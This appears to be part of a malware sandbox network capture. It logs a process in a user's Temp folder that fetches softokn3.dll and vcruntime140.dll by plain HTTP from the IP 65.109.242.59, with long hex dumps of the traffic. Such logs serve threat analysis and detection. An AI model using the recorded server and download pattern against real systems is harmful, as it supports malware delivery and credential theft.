                                                          2024-05-26 22:28:23 UTC16384INData Raw: 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d 48 11 1e 10 89 ca 09 c2 0f 84 b1 fe ff
                                                          Data Ascii: w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SLH
                                                          2024-05-26 22:28:23 UTC16384INData Raw: 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 68 78 fc 1b 10 6a 0e e8 0a 8f 02 00 83
                                                          Data Ascii: $pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hhhxj
                                                          2024-05-26 22:28:23 UTC16384INData Raw: 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 00 8b 45 08 ff 70 1c 68 20 85 1c 10 eb
                                                          Data Ascii: o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$hEph
                                                          2024-05-26 22:28:23 UTC16384INData Raw: 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 18 89 d8 83 c0 04 68 fc 01 00 00 6a 00
                                                          Data Ascii: h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
                                                          2024-05-26 22:28:23 UTC16384INData Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d
                                                          Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
                                                          2024-05-26 22:28:23 UTC16384INData Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02
                                                          Data Ascii: WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
                                                          2024-05-26 22:28:23 UTC16384INData Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9
                                                          Data Ascii: D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          23192.168.2.54976465.109.242.594431436C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-26 22:28:25 UTC174OUTGET /softokn3.dll HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:26 UTC246INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:25 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 257872
                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                          Connection: close
                                                          ETag: "6315a9f4-3ef50"
                                                          Accept-Ranges: bytes
                                                          2024-05-26 22:28:26 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                          2024-05-26 22:28:26 UTC16384INData Raw: ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c c7
                                                          Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(^_[]]
                                                          2024-05-26 22:28:26 UTC16384INData Raw: ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d 02 00 83 c4 04 a3 38 9a 03 10 ff 75 0c e8
                                                          Data Ascii: kWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM8u
                                                          2024-05-26 22:28:26 UTC16384INData Raw: 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 ba 01 e0 01 e0 33 11 be 01 f1 01 f1 33 71
                                                          Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
                                                          2024-05-26 22:28:26 UTC16384INData Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c
                                                          Data Ascii: !=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7|
                                                          2024-05-26 22:28:26 UTC16384INData Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a
                                                          Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
                                                          2024-05-26 22:28:26 UTC16384INData Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf
                                                          Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZVxM@
                                                          2024-05-26 22:28:26 UTC16384INData Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73
                                                          Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
                                                          2024-05-26 22:28:26 UTC16384INData Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00
                                                          Data Ascii: USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4|~
                                                          2024-05-26 22:28:26 UTC16384INData Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff
                                                          Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          24192.168.2.54976565.109.242.594431436C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-26 22:28:27 UTC178OUTGET /vcruntime140.dll HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:27 UTC245INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:27 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 80880
                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                          Connection: close
                                                          ETag: "6315a9f4-13bf0"
                                                          Accept-Ranges: bytes
                                                          2024-05-26 22:28:27 UTC16139INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                          2024-05-26 22:28:27 UTC16384INData Raw: ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 0c 74 4f 0f b6 f8 0f b6 42 0c 2b f8 75 18
                                                          Data Ascii: NB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u
                                                          2024-05-26 22:28:27 UTC16384INData Raw: 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 85 ff 74 1c 8b 45 f8 89 07 8b 45 fc 89 47
                                                          Data Ascii: Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt tEEG
